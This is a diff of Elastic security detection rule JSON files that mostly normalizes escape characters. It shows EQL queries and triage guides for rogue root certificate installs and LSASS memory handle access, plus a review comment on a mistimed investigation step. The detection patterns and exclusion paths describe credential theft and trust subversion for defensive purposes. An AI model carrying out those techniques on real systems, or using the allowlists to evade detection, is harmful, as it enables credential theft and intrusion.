Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, other registry or file modifications, and any spawned child processes.\n- If one of the processes is suspicious, retrieve it and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n registry.path :\n (\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\"\n ) and\n not process.executable : (\n \"?:\\\\ProgramData\\\\Lenovo\\\\Vantage\\\\Addins\\\\LenovoHardwareScanAddin\\\\*\\\\LdeApi.Server.exe\",\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptionsPlus\\\\Plugins\\\\64\\\\certmgr.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\ProgramData\\\\Quest\\\\KACE\\\\modules\\\\clientidentifier\\\\clientidentifier.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\CCM\\\\CcmExec.exe\",\n 
\"?:\\\\Windows\\\\ccmsetup\\\\cache\\\\ccmsetup.exe\",\n \"?:\\\\Windows\\\\Cluster\\\\clussvc.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\Lenovo\\\\ImController\\\\PluginHost86\\\\Lenovo.Modern.ImController.PluginHost.Device.exe\",\n \"?:\\\\Windows\\\\Lenovo\\\\ImController\\\\Service\\\\Lenovo.Modern.ImController.exe\",\n \"?:\\\\Windows\\\\Sysmon.exe\",\n \"?:\\\\Windows\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\System32\\\\*.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\WinSxS\\\\*.exe\"\n )\n", + "references": [ + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://www.ired.team/offensive-security/persistence/t1130-install-root-certificate" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense 
Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.004", + "name": "Install Root Certificate", + "reference": "https://attack.mitre.org/techniques/T1553/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_102.json b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_102.json index 4c0df8e7b7d..1bf6e0900cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_102.json +++ b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_103.json b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_103.json index 89ad4ce55e7..ca5b29a8f7b 100644 --- a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_103.json 
+++ b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_104.json b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_104.json index 9561226bc95..20874bf9944 100644 --- a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_205.json b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_205.json index bd680e9b46a..666b9a462ed 100644 --- a/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_205.json +++ b/packages/security_detection_engine/kibana/security_rule/2045567e-b0af-444a-8c0b-0b6e2dae9e13_205.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_102.json b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_102.json index bcc7745ea47..ae10a57b5b1 100644 --- a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_102.json @@ -42,7 +42,7 @@ ], "risk_score": 73, "rule_id": "20457e4f-d1de-4b92-ae69-142e27a4342a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_103.json b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_103.json index 76f2d715fa9..ed06a8c9962 100644 --- a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_103.json 
@@ -42,7 +42,7 @@ ], "risk_score": 73, "rule_id": "20457e4f-d1de-4b92-ae69-142e27a4342a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_104.json b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_104.json index 4b0e094e795..d053b267992 100644 --- a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_104.json 
@@ -42,7 +42,7 @@ ], "risk_score": 73, "rule_id": "20457e4f-d1de-4b92-ae69-142e27a4342a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_105.json b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_105.json index ca7655e49df..355d2df8f8e 100644 --- a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_105.json 
@@ -51,7 +51,7 @@
 ],
 "risk_score": 73,
 "rule_id": "20457e4f-d1de-4b92-ae69-142e27a4342a",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_106.json b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_106.json
index c4ef82bdf08..d9432f44da2 100644
--- a/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/20457e4f-d1de-4b92-ae69-142e27a4342a_106.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/205b52c4-9c28-4af4-8979-935f3278d61a_1.json b/packages/security_detection_engine/kibana/security_rule/205b52c4-9c28-4af4-8979-935f3278d61a_1.json
index e94201e5053..c5bc876b9bd 100644
--- a/packages/security_detection_engine/kibana/security_rule/205b52c4-9c28-4af4-8979-935f3278d61a_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/205b52c4-9c28-4af4-8979-935f3278d61a_1.json
@@ -46,7 +46,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -61,7 +61,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_105.json b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_105.json
index 786ad7d7d14..3f1a00f4f08 100644
--- a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_105.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Handle Access", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. 
If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. 
After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` 
cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where host.os.type == \"windows\" and event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. 
*/\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\")\n",
 "references": [
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656",
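Review bot: The investigation step in the new `note` value reads `Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.`, but this rule alerts on a 4656 handle request against lsass.exe, so "after the registry modification" is the wrong time anchor and looks carried over from a registry-focused guide. Suggest `... login events (for example, 4624) to the target host after the LSASS handle access.` so the analyst pivots from the right event. The same sentence appears in the setup-only hunk of the next rule version, so the text presumably originates upstream and the fix belongs in the current rule version rather than in this `_105` snapshot; the change under review only normalizes JSON escapes and leaves the wording unchanged.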
@@ -72,7 +72,7 @@
 ],
 "risk_score": 73,
 "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de",
- "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_106.json b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_106.json
index bde9738ae4e..00b8247fd47 100644
--- a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_106.json
